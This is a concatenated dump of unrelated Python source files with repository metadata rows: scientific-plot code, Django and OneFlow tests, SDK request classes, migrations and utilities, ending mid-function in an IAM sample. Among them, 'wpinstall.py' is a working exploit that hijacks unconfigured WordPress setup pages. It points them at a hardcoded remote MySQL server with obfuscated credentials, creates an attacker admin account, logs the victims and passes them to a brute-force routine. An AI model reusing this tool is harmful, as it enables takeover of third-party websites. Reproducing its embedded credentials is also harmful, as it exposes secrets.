def evaluate(n, x0, c, f):
res = x0
for _ in range(n):
res = f(c, res)
return res
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
C = np.linspace(0, 4, 200)
N = np.arange(1, 2001)
X, Y = np.meshgrid(C, N)
#Z = evaluate(Y, .5, X, logistic)
Z = np.empty_like(X)
for i in range(X.shape[0]):
for j in range(X.shape[1]):
Z[i, j] = evaluate(Y[i, j], .5, X[i, j], logistic)
ax.plot_surface(X, Y, Z, rstride=10, cstride=10, cmap=cm.jet, linewidth=0,)
plt.show()
|
[
"[email protected]"
] | |
cff3e9148fe021dbca2f36fd24270a1aace86027
|
d9aa525b6a359378572fa7e48bd4fb8529b9ce23
|
/monitoring/services/tests.py
|
2e6a0fa69ed320fbbe1fcc4f7506227fdb4949ab
|
[
"Apache-2.0"
] |
permissive
|
naanal/monasca-ui
|
cb5b7c279836d31809392d5b4572536fbea3634e
|
37d8926015e35f8949606183469d532924ab58c2
|
refs/heads/master
| 2020-02-26T13:04:25.471867 | 2016-08-16T05:39:24 | 2016-08-16T05:39:24 | 64,387,546 | 0 | 0 | null | 2016-07-28T10:46:54 | 2016-07-28T10:46:53 | null |
UTF-8
|
Python
| false | false | 1,595 |
py
|
# coding=utf-8
from django.core import urlresolvers
from django.test import RequestFactory
from mock import patch, call # noqa
from monitoring.test import helpers
from monitoring.services import constants
from monitoring.services import views
INDEX_URL = urlresolvers.reverse(
constants.URL_PREFIX + 'index')
class ServicesTest(helpers.TestCase):
def test_index_get(self):
res = self.client.get(INDEX_URL)
self.assertTemplateUsed(
res, 'monitoring/services/index.html')
self.assertTemplateUsed(res, 'monitoring/services/monitor.html')
class KibanaProxyViewTest(helpers.TestCase):
def setUp(self):
super(KibanaProxyViewTest, self).setUp()
self.view = views.KibanaProxyView()
self.request_factory = RequestFactory()
def test_get_relative_url_with_unicode(self):
"""Tests if it properly converts multibyte characters"""
import urlparse
self.view.request = self.request_factory.get(
'/', data={'a': 1, 'b': 2}
)
expected_path = ('/elasticsearch/.kibana/search'
'/New-Saved-Search%E3%81%82')
expected_qs = {'a': ['1'], 'b': ['2']}
url = self.view.get_relative_url(
u'/elasticsearch/.kibana/search/New-Saved-Searchあ'
)
# order of query params may change
parsed_url = urlparse.urlparse(url)
actual_path = parsed_url.path
actual_qs = urlparse.parse_qs(parsed_url.query)
self.assertEqual(actual_path, expected_path)
self.assertEqual(actual_qs, expected_qs)
|
[
"[email protected]"
] | |
50c0db940d1a81503c735523e554c2f9aa4e8c25
|
be0f3dfbaa2fa3d8bbe59229aef3212d032e7dd1
|
/Gauss_v45r10p1/Gen/DecFiles/options/31503010.py
|
a0d860e470e74eab4f359406d68c4a1e5df58223
|
[] |
no_license
|
Sally27/backup_cmtuser_full
|
34782102ed23c6335c48650a6eaa901137355d00
|
8924bebb935b96d438ce85b384cfc132d9af90f6
|
refs/heads/master
| 2020-05-21T09:27:04.370765 | 2018-12-12T14:41:07 | 2018-12-12T14:41:07 | 185,989,173 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 762 |
py
|
# file /home/hep/ss4314/cmtuser/Gauss_v45r10p1/Gen/DecFiles/options/31503010.py generated: Wed, 25 Jan 2017 15:25:30
#
# Event Type: 31503010
#
# ASCII decay Descriptor: [tau- -> pi- pi+ pi- nu_tau]cc
#
from Configurables import Generation
Generation().EventType = 31503010
Generation().SampleGenerationTool = "SignalPlain"
from Configurables import SignalPlain
Generation().addTool( SignalPlain )
Generation().SignalPlain.ProductionTool = "PythiaProduction"
from Configurables import ToolSvc
from Configurables import EvtGenDecay
ToolSvc().addTool( EvtGenDecay )
ToolSvc().EvtGenDecay.UserDecayFile = "$DECFILESROOT/dkfiles/tau_pi-pi+pi-nu=DecProdCut.dec"
Generation().SignalPlain.CutTool = "DaughtersInLHCb"
Generation().SignalPlain.SignalPIDList = [ 15,-15 ]
|
[
"[email protected]"
] | |
464fd32e21826eb900ab44421bba05a56e8c869a
|
6935f8334f17e59f0691695e1404ce2fa3c18b98
|
/src/signali_notification/migrations/0001_initial.py
|
f541895c83cd237322504219131944b4e337173d
|
[] |
no_license
|
obshtestvo/signali
|
a7b74746cba487ea3dacedbd2eda4876b972056e
|
f0c64bea9e151023612e33e476d0723819924e19
|
refs/heads/master
| 2016-08-05T17:13:55.793165 | 2016-01-20T16:39:36 | 2016-01-20T16:39:36 | 34,040,168 | 0 | 3 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,159 |
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('signali_contact', '0004_auto_20150903_0029'),
]
operations = [
migrations.CreateModel(
name='Subscriber',
fields=[
('id', models.AutoField(auto_created=True, serialize=False, primary_key=True, verbose_name='ID')),
('email', models.EmailField(max_length=250, verbose_name='email')),
('last_notified_at', models.DateTimeField(default=django.utils.timezone.now, verbose_name='Last notified at')),
('created_at', models.DateTimeField(default=django.utils.timezone.now, verbose_name='Added at')),
('contactpoint', models.ForeignKey(related_name='subscribers', to='signali_contact.ContactPoint')),
],
options={
'abstract': False,
'verbose_name_plural': 'subscriber',
'verbose_name': 'subscriber',
},
bases=(models.Model,),
),
]
|
[
"[email protected]"
] | |
170ccd24c50321c37c6335c0652314406ed7802a
|
22a7161361089b84a09457b46d79ce2bd87f5b2c
|
/tests/urls.py
|
bb83d09b1ab5c7ac9d1103f51acf97588d336b6b
|
[] |
no_license
|
matthew-a-dunlap/django-inspectional-registration
|
56fb9b9945d41de069034fd066e3b92b388b8498
|
d6dd945718e5f7ac09966763c83104c4966cb775
|
refs/heads/master
| 2020-09-09T17:33:18.128626 | 2016-05-23T19:57:19 | 2016-05-23T19:57:19 | 221,512,520 | 0 | 0 | null | 2019-11-13T17:13:08 | 2019-11-13T17:13:07 | null |
UTF-8
|
Python
| false | false | 399 |
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
try:
from django.conf.urls import url, patterns, include
except ImportError:
from django.conf.urls.defaults import url, patterns, include
from django.contrib import admin
admin.autodiscover()
urlpatterns = patterns('',
url(r'^admin/', include(admin.site.urls)),
url(r'^registration/', include('registration.urls')),
)
|
[
"[email protected]"
] | |
4c19d1c4ca2143d49702c83bd6fe7486af618b32
|
6df4a4cbdaf59009838b2c70b518e66633c67de0
|
/user_portrait/cron/recommentation_in/filter_rules.py
|
c4a58b227bbab39a9fd134e2bd2cc7cfcf24955f
|
[] |
no_license
|
jianjian0dandan/user_portrait
|
ccf5f43f0aca2d40581faae215fdda1db997a354
|
3114ca2fcec23a7039887cca953793ef34cb7f72
|
refs/heads/master
| 2021-01-15T19:59:16.286276 | 2016-05-18T03:30:37 | 2016-05-18T03:30:37 | 42,869,391 | 0 | 0 | null | 2015-09-21T13:56:51 | 2015-09-21T13:56:51 | null |
UTF-8
|
Python
| false | false | 4,731 |
py
|
# -*- coding: UTF-8 -*-
import sys
import csv
import json
import time
reload(sys)
sys.path.append('../../')
from global_utils import R_CLUSTER_FLOW2 as r_cluster
from global_utils import R_DICT, es_retweet, retweet_index_name_pre, retweet_index_type
from time_utils import datetime2ts, ts2datetime
from parameter import DAY
from parameter import RUN_TYPE, RUN_TEST_TIME
from parameter import RECOMMEND_IN_ACTIVITY_THRESHOLD as activity_threshold
from parameter import RECOMMEND_IN_IP_THRESHOLD as ip_threshold
from parameter import RECOMMEND_IN_RETWEET_THRESHOLD as retweet_threshold
from parameter import RECOMMEND_IN_MENTION_THRESHOLD as mention_threshold
from cron.detect.cron_detect import get_db_num
csvfile = open('/home/ubuntu8/huxiaoqian/user_portrait/user_portrait/cron/recommentation_in/filter_uid_list.csv', 'wb')
writer = csv.writer(csvfile)
def filter_activity(user_set):
results = []
#run_type
if RUN_TYPE == 1:
now_date = ts2datetime(time.time())
else:
now_date = RUN_TEST_TIME
ts = datetime2ts(now_date) - DAY
date = ts2datetime(ts)
timestamp = datetime2ts(date)
for user in user_set:
over_count = 0
for i in range(0,7):
ts = timestamp - DAY*i
result = r_cluster.hget('activity_'+str(ts), str(user))
if result:
items_dict = json.loads(result)
for item in items_dict:
weibo_count = items_dict[item]
if weibo_count > activity_threshold:
over_count += 1
if over_count == 0:
results.append(user)
else:
writer.writerow([user, 'activity'])
return results
def filter_ip(user_set):
results = []
#run_type
if RUN_TYPE == 1:
now_date = ts2datetime(time.time())
else:
now_date = RUN_TEST_TIME
ts = datetime2ts(now_date) - DAY
for user in user_set:
ip_set = set()
for i in range(0,7):
timestamp = ts - DAY*i
ip_result = r_cluster.hget('ip_'+str(ts), str(user))
if ip_result:
result_dict = json.loads(ip_result)
else:
result_dict = {}
for ip in result_dict:
ip_set.add(ip)
if len(ip_set) < ip_threshold:
results.append(user)
else:
writer.writerow([user, 'ip'])
return results
def filter_retweet_count(user_set):
FILTER_ITER_COUNT = 100;
results = []
now_ts = time.time()
db_number = get_db_num(now_ts)
retweet_index_name = retweet_index_name_pre + str(db_number)
# test
search_user_count = len(user_set);
iter_search_count = 0
while iter_search_count < search_user_count:
iter_search_user_list = user_set[iter_search_count:iter_search_count + FILTER_ITER_COUNT]
try:
retweet_result = es_retweet.mget(index = retweet_index_name, doc_type = retweet_index_type,\
body = {'ids':iter_search_user_list}, _source=True)['docs']
except:
retweet_result = []
for retweet_item in retweet_result:
if retweet_item['found']:
retweet_set = set()
user = retweet_item['_id']
per_retweet_result = json.loads(retweet_item['_source']['uid_retweet'])
for retweet_user in per_retweet_result:
retweet_set.add(retweet_user)
if len(retweet_set) < retweet_threshold:
results.append(user)
else:
writer.writerow([user, 'retweet'])
else:
user = retweet_item['_id']
results.append(user)
iter_search_count += FILTER_ITER_COUNT
return results
def filter_mention(user_set):
results = []
#run_type
if RUN_TYPE == 1:
now_date = ts2datetime(time.time())
else:
now_date = RUN_TEST_TIME
timestamp = datetime2ts(now_date) - DAY
date = ts2datetime(timestamp)
for user in user_set:
mention_set = set()
for i in range(0,7):
ts = timestamp - DAY*i
result = r_cluster.hget('at_'+str(ts), str(user))
if result:
item_dict = json.loads(result)
for at_user in item_dict:
mention_set.add(at_user)
at_count = len(mention_set)
if at_count < mention_threshold:
results.append(user)
else:
writer.writerow([user, 'mention'])
return results
|
[
"[email protected]"
] | |
1e44f68b4293ce9210579097294860acfc7ebac2
|
f8f2536fa873afa43dafe0217faa9134e57c8a1e
|
/aliyun-python-sdk-ons/aliyunsdkons/request/v20190214/UntagResourcesRequest.py
|
3e59f17cdafd0c517f61e6e5a9daaacecfc58d26
|
[
"Apache-2.0"
] |
permissive
|
Sunnywillow/aliyun-openapi-python-sdk
|
40b1b17ca39467e9f8405cb2ca08a85b9befd533
|
6855864a1d46f818d73f5870da0efec2b820baf5
|
refs/heads/master
| 2022-12-04T02:22:27.550198 | 2020-08-20T04:11:34 | 2020-08-20T04:11:34 | 288,944,896 | 1 | 0 |
NOASSERTION
| 2020-08-20T08:04:01 | 2020-08-20T08:04:01 | null |
UTF-8
|
Python
| false | false | 2,302 |
py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkons.endpoint import endpoint_data
class UntagResourcesRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'Ons', '2019-02-14', 'UntagResources','ons')
self.set_method('POST')
if hasattr(self, "endpoint_map"):
setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
if hasattr(self, "endpoint_regional"):
setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
def get_All(self):
return self.get_query_params().get('All')
def set_All(self,All):
self.add_query_param('All',All)
def get_ResourceIds(self):
return self.get_query_params().get('ResourceIds')
def set_ResourceIds(self, ResourceIds):
for depth1 in range(len(ResourceIds)):
if ResourceIds[depth1] is not None:
self.add_query_param('ResourceId.' + str(depth1 + 1) , ResourceIds[depth1])
def get_ResourceType(self):
return self.get_query_params().get('ResourceType')
def set_ResourceType(self,ResourceType):
self.add_query_param('ResourceType',ResourceType)
def get_InstanceId(self):
return self.get_query_params().get('InstanceId')
def set_InstanceId(self,InstanceId):
self.add_query_param('InstanceId',InstanceId)
def get_TagKeys(self):
return self.get_query_params().get('TagKeys')
def set_TagKeys(self, TagKeys):
for depth1 in range(len(TagKeys)):
if TagKeys[depth1] is not None:
self.add_query_param('TagKey.' + str(depth1 + 1) , TagKeys[depth1])
|
[
"[email protected]"
] | |
45620672ed607a3171dae6cf19a63dea278a32ce
|
e23a4f57ce5474d468258e5e63b9e23fb6011188
|
/125_algorithms/_exercises/templates/_algorithms_challenges/edabit/_Edabit-Solutions-master/Odd Up, Even Down/solution.py
|
280dd4e50c5e27743667091935a4280519266904
|
[] |
no_license
|
syurskyi/Python_Topics
|
52851ecce000cb751a3b986408efe32f0b4c0835
|
be331826b490b73f0a176e6abed86ef68ff2dd2b
|
refs/heads/master
| 2023-06-08T19:29:16.214395 | 2023-05-29T17:09:11 | 2023-05-29T17:09:11 | 220,583,118 | 3 | 2 | null | 2023-02-16T03:08:10 | 2019-11-09T02:58:47 |
Python
|
UTF-8
|
Python
| false | false | 149 |
py
|
___ transform(lst
output # list
___ i __ lst:
__ i % 2 __ 0:
?.a.. i-1)
____
?.a.. i+1)
r.. ?
|
[
"[email protected]"
] | |
b74fd5349fcc910ed9dcad8717e15620b73eb4be
|
c516df2118000e3abaa61527de7badb94680081e
|
/utilities/common.py
|
b3a2eae746c77898ae21aed1623a0194a141bbd9
|
[
"MIT"
] |
permissive
|
xod442/paw
|
82c8d54af052edaea05ed36a0846fe9722f047f3
|
f55df04dd7af7a1b25844c809187a99cfb24b813
|
refs/heads/main
| 2023-04-16T12:19:50.849945 | 2021-04-26T20:06:51 | 2021-04-26T20:06:51 | 360,992,530 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,345 |
py
|
import time
import boto3
from flask import current_app
import datetime
import arrow
import bleach
def utc_now_ts():
return int(time.time())
def utc_now_ts_ms():
return lambda: int(round(time.time() * 1000))
def ms_stamp_humanize(ts):
ts = datetime.datetime.fromtimestamp(ts/1000.0)
return arrow.get(ts).humanize()
def linkify(text):
text = bleach.clean(text, tags=[], attributes={}, styles=[], strip=True)
return bleach.linkify(text)
def email(to_email, subject, body_html, body_text):
# don't run this if we're running a test or setting is False
if current_app.config.get('TESTING') or not current_app.config.get('AWS_SEND_MAIL'):
return False
client = boto3.client('ses')
return client.send_email(
Source='[email protected]',
Destination={
'ToAddresses': [
to_email,
]
},
Message={
'Subject': {
'Data': subject,
'Charset': 'UTF-8'
},
'Body': {
'Text': {
'Data': body_text,
'Charset': 'UTF-8'
},
'Html': {
'Data': body_html,
'Charset': 'UTF-8'
},
}
}
)
|
[
"[email protected]"
] | |
1fe26b687dbd81149de336083512b6e7129e88d1
|
2eb779146daa0ba6b71344ecfeaeaec56200e890
|
/python/oneflow/compatible/single_client/test/ops/test_transpose.py
|
02117e32289d49fe2caa7a1e4f230115958caf6e
|
[
"Apache-2.0"
] |
permissive
|
hxfxjun/oneflow
|
ee226676cb86f3d36710c79cb66c2b049c46589b
|
2427c20f05543543026ac9a4020e479b9ec0aeb8
|
refs/heads/master
| 2023-08-17T19:30:59.791766 | 2021-10-09T06:58:33 | 2021-10-09T06:58:33 | 414,906,649 | 0 | 0 |
Apache-2.0
| 2021-10-09T06:15:30 | 2021-10-08T08:29:45 |
C++
|
UTF-8
|
Python
| false | false | 4,027 |
py
|
"""
Copyright 2020 The OneFlow Authors. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import unittest
from collections import OrderedDict
import numpy as np
import tensorflow as tf
import test_global_storage
from test_util import GenArgList
import oneflow.compatible.single_client.unittest
from oneflow.compatible import single_client as flow
from oneflow.compatible.single_client import typing as tp
gpus = tf.config.experimental.list_physical_devices("GPU")
for gpu in gpus:
tf.config.experimental.set_memory_growth(gpu, True)
def compare_with_tensorflow(device_type, input_shape, perm):
assert device_type in ["gpu", "cpu"]
flow.clear_default_session()
func_config = flow.FunctionConfig()
func_config.default_data_type(flow.float)
@flow.global_function(type="train", function_config=func_config)
def TransposeJob():
with flow.scope.placement(device_type, "0:0"):
x = flow.get_variable(
"input",
shape=input_shape,
dtype=flow.float,
initializer=flow.random_uniform_initializer(minval=2, maxval=5),
trainable=True,
)
loss = flow.transpose(x, perm)
flow.optimizer.SGD(
flow.optimizer.PiecewiseConstantScheduler([], [0.0001]), momentum=0
).minimize(loss)
flow.watch(x, test_global_storage.Setter("x"))
flow.watch_diff(x, test_global_storage.Setter("x_diff"))
flow.watch(loss, test_global_storage.Setter("loss"))
flow.watch_diff(loss, test_global_storage.Setter("loss_diff"))
return loss
of_out = TransposeJob().get()
with tf.GradientTape(persistent=True) as tape:
x = tf.Variable(test_global_storage.Get("x"))
tf_out = tf.transpose(x, perm)
loss_diff = test_global_storage.Get("loss_diff")
tf_x_diff = tape.gradient(tf_out, x, loss_diff)
assert np.allclose(of_out.numpy(), tf_out.numpy(), rtol=1e-05, atol=1e-05)
assert np.allclose(
test_global_storage.Get("x_diff"), tf_x_diff.numpy(), rtol=1e-05, atol=1e-05
)
@flow.unittest.skip_unless_1n1d()
class TestTranspose(flow.unittest.TestCase):
def test_transpose(test_case):
arg_dict = OrderedDict()
arg_dict["device_type"] = ["gpu", "cpu"]
arg_dict["input_shape"] = [(10, 11, 12, 13)]
arg_dict["perm"] = [(2, 0, 1, 3), (1, 0, 2, 3), (3, 2, 1, 0), (3, 1, 2, 0)]
for arg in GenArgList(arg_dict):
compare_with_tensorflow(*arg)
def test_transpose2(test_case):
arg_dict = OrderedDict()
arg_dict["device_type"] = ["gpu", "cpu"]
arg_dict["input_shape"] = [(10, 11, 12)]
arg_dict["perm"] = [(2, 0, 1), (1, 0, 2), (2, 1, 0), (1, 2, 0)]
for arg in GenArgList(arg_dict):
compare_with_tensorflow(*arg)
def test_transpose3(test_case):
arg_dict = OrderedDict()
arg_dict["device_type"] = ["gpu", "cpu"]
arg_dict["input_shape"] = [(10, 11)]
arg_dict["perm"] = [(1, 0), (0, 1)]
for arg in GenArgList(arg_dict):
compare_with_tensorflow(*arg)
def test_transpose_dim6(test_case):
arg_dict = OrderedDict()
arg_dict["device_type"] = ["gpu", "cpu"]
arg_dict["input_shape"] = [(2, 3, 4, 5, 6, 7)]
arg_dict["perm"] = [(2, 0, 1, 3, 5, 4)]
for arg in GenArgList(arg_dict):
compare_with_tensorflow(*arg)
if __name__ == "__main__":
unittest.main()
|
[
"[email protected]"
] | |
60e077f3f23f697b0b33bdeca4b24594f3478247
|
626b14ce13986b6d5e03143e151004247659625a
|
/Day01-15/code/Day08/student.py
|
7d753978b63ee1f015b2f6a12f70198e93ff89bc
|
[] |
no_license
|
Focavn/Python-100-Days
|
c7586ecf7ae3f1fd42f024558bb998be23ee9df8
|
d8de6307aeff9fe31fd752bd7725b9cc3fbc084b
|
refs/heads/master
| 2021-08-08T17:57:02.025178 | 2020-09-17T11:58:04 | 2020-09-17T11:58:04 | 220,427,144 | 0 | 0 | null | 2019-11-08T08:59:43 | 2019-11-08T08:59:41 | null |
UTF-8
|
Python
| false | false | 1,108 |
py
|
"""
定义和使用学生类
Version: 0.1
Author: 骆昊
Date: 2018-03-08
"""
def _foo():
print('test')
class Student(object):
# __init__是一个特殊方法用于在创建对象时进行初始化操作
# 通过这个方法我们可以为学生对象绑定name和age两个属性
def __init__(self, name, age):
self.name = name
self.age = age
def study(self, course_name):
print('%s正在学习%s.' % (self.name, course_name))
# PEP 8要求标识符的名字用全小写多个单词用下划线连接
# 但是很多程序员和公司更倾向于使用驼峰命名法(驼峰标识)
def watch_av(self):
if self.age < 18:
print('%s只能观看《熊出没》.' % self.name)
else:
print('%s正在观看岛国大电影.' % self.name)
def main():
stu1 = Student('骆昊', 38)
stu1.study('Python程序设计')
stu1.watch_av()
stu2 = Student('王大锤', 15)
stu2.study('思想品德')
stu2.watch_av()
if __name__ == '__main__':
main()
|
[
"[email protected]"
] | |
96b72c3e8d75f73087aa5d785f9d688d43fba4a9
|
920b9cb23d3883dcc93b1682adfee83099fee826
|
/iam/meta.py
|
1c14641c524eaf4af143f55b16491ad41f993154
|
[
"MIT",
"LGPL-2.1-or-later",
"LGPL-3.0-only"
] |
permissive
|
TencentBlueKing/bk-itsm
|
f817fb166248d3059857b57d03e8b5ec1b78ff5b
|
2d708bd0d869d391456e0fb8d644af3b9f031acf
|
refs/heads/master
| 2023-08-31T23:42:32.275836 | 2023-08-22T08:17:54 | 2023-08-22T08:17:54 | 391,839,825 | 100 | 86 |
MIT
| 2023-09-14T08:24:54 | 2021-08-02T06:35:16 |
Python
|
UTF-8
|
Python
| false | false | 1,689 |
py
|
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community
Edition) available.
Copyright (C) 2017-2020 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
_SYSTEM = "system"
_RESOURCES = "resources"
_ACTIONS = "actions"
__meta_info__ = {_SYSTEM: {}, _RESOURCES: {}, _ACTIONS: {}}
def setup_system(system_id, system_name):
__meta_info__[_SYSTEM].setdefault(system_id, {})["name"] = system_name
def get_system_name(system_id):
return __meta_info__[_SYSTEM].get(system_id, {}).get("name")
def setup_resource(system_id, resource_id, resource_name):
__meta_info__[_RESOURCES].setdefault(system_id, {}).setdefault(resource_id, {})["name"] = resource_name
def get_resource_name(system_id, resource_id):
return __meta_info__[_RESOURCES].get(system_id, {}).get(resource_id, {}).get("name")
def setup_action(system_id, action_id, action_name):
__meta_info__[_ACTIONS].setdefault(system_id, {}).setdefault(action_id, {})["name"] = action_name
def get_action_name(system_id, action_id):
return __meta_info__[_ACTIONS].get(system_id, {}).get(action_id, {}).get("name")
|
[
"[email protected]"
] | |
20a9aad0196588ee85844a524186b9c74f485d9b
|
63862669b6b428ef23e2733e50b47ef7a11ceb60
|
/basic info/varia.py
|
ce978e8d87db873269e2593e3bcd2404f720095d
|
[] |
no_license
|
CyborgVillager/Learning_py_info
|
961fde2cdba7ec0b7e1aacd437aeba99083cd192
|
a1504ab4610f88ae2de738a49ac6513c3358a177
|
refs/heads/master
| 2020-11-25T22:17:33.966387 | 2020-02-11T04:34:29 | 2020-02-11T04:34:29 | 228,869,781 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 620 |
py
|
#variables
def story_example():
name = "John"
age = 25
para0 = "Lorem ipsum dolor sit amet, consectetur adipiscing elit. In interdum, odio et feugiat auctor, ante leo t" \
"incidunt tortor, sed lacinia leo augue vel lorem. In rutrum est libero"
para1 = "Nunc euismod magna in diam finibus sollicitudin. Aliquam commodo tortor lorem, in tincidunt quam dapibus " \
"fringilla. Duis vitae sem ut ligula efficitur varius."
print(name, 'is age', str(age), para0, '\n', name, para1)
def story_start():
story_example()
story_start()
|
[
"[email protected]"
] | |
249c8be8faca60c67ed1827c6122bee07e1fa8ac
|
a5a4cee972e487512275c34f308251e6cc38c2fa
|
/tests_old/tests_openmpi/test_hello_world/test_hello_world.py
|
b5a6b03915a4a452b63bb6efdf8838d172ecddf7
|
[
"MIT"
] |
permissive
|
eragasa/pypospack
|
4f54983b33dcd2dce5b602bc243ea8ef22fee86b
|
21cdecaf3b05c87acc532d992be2c04d85bfbc22
|
refs/heads/master
| 2021-06-16T09:24:11.633693 | 2019-12-06T16:54:02 | 2019-12-06T16:54:02 | 99,282,824 | 4 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 706 |
py
|
from subprocess import call
import os
# possibly the greatest hack of a test to ever be written
def test_hello_world():
call(["sbatch", "runjob_hipergator.sh"])
while True:
r0 = os.path.exists("rank_0")
r1 = os.path.exists("rank_1")
r2 = os.path.exists("rank_2")
r3 = os.path.exists("rank_3")
err = os.path.exists("job.err")
if all([r0, r1, r2, r3]):
os.remove("rank_0")
os.remove("rank_1")
os.remove("rank_2")
os.remove("rank_3")
assert True
return
if err:
os.remove("job.err")
os.remove("job.out")
assert False
return
|
[
"[email protected]"
] | |
e39ec3b82e0551f31532345f993df0e4da0ee93f
|
459185e0e12d486e91fcfff3e6d6174afbdf70db
|
/JEX-V4/Exploits/wpinstall.py
|
84eb5f88c61670e0b117e32045f691f557ac28bc
|
[] |
no_license
|
Hdiaktoros/laravel-dorks
|
e42a1be938b0fdbbf17e6689d50c7f8bcf30c464
|
a9ae0af4a27b522f939b5c1627db3b98f18bb5c3
|
refs/heads/main
| 2023-07-05T02:59:17.032717 | 2021-08-21T16:30:42 | 2021-08-21T16:30:42 | 398,522,099 | 2 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,456 |
py
|
# coding=utf-8
from Exploits import printModule
import requests
from random import sample
from BruteForce import Wordpress
# ----------------==---- MY USER AGent ----==----------------
Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0'}
# -------------------- MYSQl SERVER INFO --------------------
HOST = '31.210.78.238'
USER = 'francesco_res'
PASS = 'L30zDTZDTP'[::-1]
DB = 'francesco_reservex'
# ----------------==---- WpInstall Info ----==----------------
username = 'u1337'
password = 'uAdmin@123'
# ------------------------------------------------------------
def RandomGenerator(lenth):
return ''.join(sample('abcdefghijklmnopqrstuvwxyz', lenth))
def WpInstall(site, Email):
session = requests.Session()
RandomStringForPREFIX = str('wp_' + str(RandomGenerator(8)) + '_')
try:
DATA = {
'dbname': DB,
'uname': USER,
'pwd': PASS,
'dbhost': HOST,
'prefix': RandomStringForPREFIX,
'language': 'en_US',
'submit': 'Submit'
}
A = session.post('http://' + site + '/wp-admin/setup-config.php?step=2', data=DATA, headers=Headers, timeout=10)
if 'install.php' in str(A.content):
POSTDATA_Install = {
'weblog_title': 'installed|jex',
'user_name': username,
'admin_password': password,
'pass1-text': password,
'admin_password2': password,
'pw_weak': 'on',
'admin_email': Email,
'Submit': 'Install+WordPress',
'language': 'en_US'
}
session.post('http://' + site + '/wp-admin/install.php?step=2', data=POSTDATA_Install,
headers=Headers, timeout=25)
except:
pass
try:
source = session.get('http://' + site + '/wp-login.php', timeout=10, headers=Headers).content
if 'installed|jex' in str(source):
with open('result/Wp-Installed.txt', 'a') as writer:
writer.write(site + '/wp-login.php\n Username: {}\n'
' Password: {}\n------------------------------------------\n'
.format(username, password))
Login = Wordpress.Wordpress()
Login.BruteForce(site, password, username)
return printModule.returnYes(site, 'N/A', 'Wp-Install', 'Wordpress')
else:
with open('result/Wp-SetupFound.txt', 'a') as writer:
writer.write('{}/wp-admin/setup-config.php\n'.format(site))
return printModule.returnNo(site, 'N/A', 'Wp-Install', 'Wordpress')
except:
return printModule.returnNo(site, 'N/A', 'Wp-Install', 'Wordpress')
def Check(site, email):
try:
PATHz = [
'',
'/wordpress',
'/wp',
'/blog',
'/test',
'/site'
]
x = 0
for path in PATHz:
C = requests.get('http://' + site + path + '/wp-admin/setup-config.php?step=0')
if 'setup-config.php?step=1' in str(C.content):
x += 1
return WpInstall(site + path, email)
if x == 0:
return printModule.returnNo(site, 'N/A', 'Wp-Install', 'Wordpress')
except:
return printModule.returnNo(site, 'N/A', 'Wp-Install', 'Wordpress')
|
[
"[email protected]"
] | |
b057a3a5c3f3098da54c67a78d50a565061a32c3
|
0dfa97730b9ad9c077868a045d89cc0d4b09f433
|
/tests/integration/goldens/credentials/samples/generated_samples/iamcredentials_generated_credentials_v1_iam_credentials_sign_blob_sync.py
|
ff60375d5635f5825a6f29c36bb0c61572147d95
|
[
"Apache-2.0"
] |
permissive
|
anukaal/gapic-generator-python
|
546c303aaf2e722956133b07abb0fb1fe581962f
|
e3b06895fa179a2038ee2b28e43054e1df617975
|
refs/heads/master
| 2023-08-24T23:16:32.305652 | 2021-10-09T15:12:14 | 2021-10-09T15:12:14 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,567 |
py
|
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Generated code. DO NOT EDIT!
#
# Snippet for SignBlob
# NOTE: This snippet has been automatically generated for illustrative purposes only.
# It may require modifications to work in your environment.
# To install the latest published package dependency, execute the following:
# python3 -m pip install google-iam-credentials
# [START iamcredentials_generated_credentials_v1_IAMCredentials_SignBlob_sync]
from google.iam import credentials_v1
def sample_sign_blob():
